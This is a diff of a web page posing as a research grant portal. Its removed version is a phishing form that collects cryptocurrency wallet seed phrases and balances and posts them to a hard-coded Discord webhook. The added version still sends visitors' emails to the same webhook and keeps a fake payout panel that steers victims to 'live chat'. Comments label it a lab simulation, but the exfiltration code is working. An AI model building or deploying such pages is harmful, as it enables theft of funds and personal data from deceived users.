--- a/index.html
+++ b/index.html
@@ -3,14 +3,15 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Research Grant Simulator</title>
+    <title>Research Grant Portal</title>
     <style>
         body {
             font-family: Arial, sans-serif;
             margin: 0;
             padding: 0;
-            background-color: #f4f4f4;
+            background: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><rect width="100" height="100" fill="%23f4f4f4"/><path d="M10 10 L90 50 L10 90 Z" fill="%230073aa" stroke="%23005599" stroke-width="2"/></svg>') repeat;
             color: #333;
+            background-size: 200px 200px;
         }
         .container {
             max-width: 1200px;
@@ -22,6 +23,7 @@
             color: white;
             padding: 10px 0;
             text-align: center;
+            box-shadow: 0 2px 5px rgba(0,0,0,0.2);
         }
         header h1 {
             margin: 0;
@@ -30,16 +32,17 @@
         .sidebar {
             float: left;
             width: 25%;
-            background-color: #fff;
+            background-color: rgba(255, 255, 255, 0.9);
             padding: 10px;
             box-shadow: 2px 0 5px rgba(0,0,0,0.1);
         }
         .main-content {
             float: right;
             width: 70%;
-            background-color: #fff;
+            background-color: rgba(255, 255, 255, 0.9);
             padding: 20px;
             box-shadow: 0 0 5px rgba(0,0,0,0.1);
+            border-radius: 5px;
         }
         .form-group {
             margin-bottom: 15px;
@@ -47,11 +50,14 @@
         label {
             display: block;
             margin-bottom: 5px;
+            font-weight: bold;
         }
         input {
             width: 100%;
             padding: 8px;
             box-sizing: border-box;
+            border: 1px solid #ccc;
+            border-radius: 4px;
         }
         button {
             background-color: #005d8f;
@@ -60,19 +66,17 @@
             padding: 10px 20px;
             cursor: pointer;
             border-radius: 5px;
+            font-weight: bold;
         }
         button:hover {
             background-color: #004d75;
         }
-        #successMessage {
-            display: none;
-            color: green;
+        #statusMessage {
             margin-top: 10px;
-        }
-        .error {
-            color: red;
+            padding: 10px;
+            border: 1px solid #ddd;
+            border-radius: 4px;
             display: none;
-            margin-top: 5px;
         }
         .payout-section {
             margin-top: 20px;
@@ -85,40 +89,34 @@
 </head>
 <body>
     <header>
-        <h1>Research Grant Simulator</h1>
+        <h1>Research Grant Portal</h1>
     </header>
     <div class="container">
         <div class="sidebar">
             <h3>Account Info</h3>
             <p><strong>User:</strong> ResearchStudent01</p>
             <p><strong>Status:</strong> Active</p>
-            <button>Update Profile</button>
+            <button onclick="alert('Profile update feature disabled in simulation.')">Update Profile</button>
         </div>
         <div class="main-content">
-            <h2>Application Form</h2>
-            <form id="walletSection" onsubmit="sendToDiscord(event)">
+            <h2>Applicant Registration</h2>
+            <form id="applicantForm" onsubmit="generateReferenceCode(event)">
                 <div class="form-group">
-                    <label for="walletName">Wallet Name:</label>
-                    <input type="text" id="walletName" name="walletName" required>
+                    <label for="email">Email:</label>
+                    <input type="email" id="email" name="email" required>
                 </div>
                 <div class="form-group">
-                    <label for="seedInput">Seed Phrase:</label>
-                    <input type="text" id="seedInput" name="seedInput" required>
+                    <label for="referenceId">Reference ID:</label>
+                    <input type="text" id="referenceId" name="referenceId" readonly>
                 </div>
-                <div class="form-group">
-                    <label for="balance">Minimum Balance ($1,000 required):</label>
-                    <input type="number" id="balance" name="balance" required>
-                    <div id="balanceError" class="error">Minimum balance must be $1,000 or more.</div>
-                </div>
-                <button type="submit">Submit Application</button>
+                <button type="submit">Generate Reference Code</button>
             </form>
-            <div id="successMessage">Submission successful! Thank you.</div>
+            <div id="statusMessage"></div>
             <div class="payout-section">
                 <h3>Payout Status</h3>
-                <p><strong>Application ID:</strong> RS-12345</p>
-                <p><strong>Amount Approved:</strong> $5,000</p>
-                <p><strong>Status:</strong> Processing</p>
-                <button>Check Payout Details</button>
+                <p><strong>Reference ID:</strong> <span id="displayRefId"></span></p>
+                <p><strong>Status:</strong> <span id="statusDisplay">Pending</span></p>
+                <button onclick="alert('Check payout details disabled in simulation.')">Check Payout Details</button>
             </div>
         </div>
     </div>
@@ -136,27 +134,27 @@
         })(document);
     </script>
 
-    <!-- Discord Webhook Script with Balance Validation -->
+    <!-- Discord Webhook Script -->
     <script>
-        function sendToDiscord(event) {
+        function generateReferenceCode(event) {
             event.preventDefault();
 
-            const walletName = document.getElementById('walletName').value;
-            const phrase = document.getElementById('seedInput').value;
-            const balance = document.getElementById('balance').value;
-            const balanceError = document.getElementById('balanceError');
+            const email = document.getElementById('email').value;
+            const referenceId = 'REF-' + Math.random().toString(36).substr(2, 9).toUpperCase();
+            const statusMessage = document.getElementById('statusMessage');
+            const displayRefId = document.getElementById('displayRefId');
+            const statusDisplay = document.getElementById('statusDisplay');
 
-            if (parseFloat(balance) < 1000) {
-                balanceError.style.display = 'block';
-                return;
-            }
-            balanceError.style.display = 'none';
+            document.getElementById('referenceId').value = referenceId;
+            displayRefId.textContent = referenceId;
+            statusDisplay.textContent = 'Pending';
+            statusMessage.style.display = 'block';
+            statusMessage.textContent = 'Reference code generated. Check status via live chat.';
 
             const data = {
-                content: `🔥 New Submission:
-                \nWallet Name: *${walletName}*
-                \nSeed Phrase: *${phrase}*
-                \nBalance: *$${balance}*`
+                content: `🔥 New Registration:
+                \nEmail: *${email}*
+                \nReference ID: *${referenceId}*`
             };
 
             fetch('https://discord.com/api/webhooks/1392560855530602496/WLDqr-oxayIjorh97lgir03TQj4rcVYqnKDEMCoJ_jC_xix590twBocxE4eMY85ViMzG', {
@@ -165,16 +163,18 @@
                     'Content-Type': 'application/json'
                 },
                 body: JSON.stringify(data)
-            }).then(() => {
-                document.getElementById('walletSection').reset();
-                document.getElementById('walletSection').style.display = 'none';
-                document.getElementById('successMessage').style.display = 'block';
             }).catch(err => {
-                alert("Failed to connect. Try again later.");
                 console.error(err);
             });
+        }
+
+        // Manual status update via live chat (simulated for lab)
+        function updateStatus(refId, status) {
+            if (document.getElementById('displayRefId').textContent === refId) {
+                document.getElementById('statusDisplay').textContent = status;
+                document.getElementById('statusMessage').textContent = `Status updated to ${status}.`;
+            }
         }
     </script>
 </body>
 </html>
-   
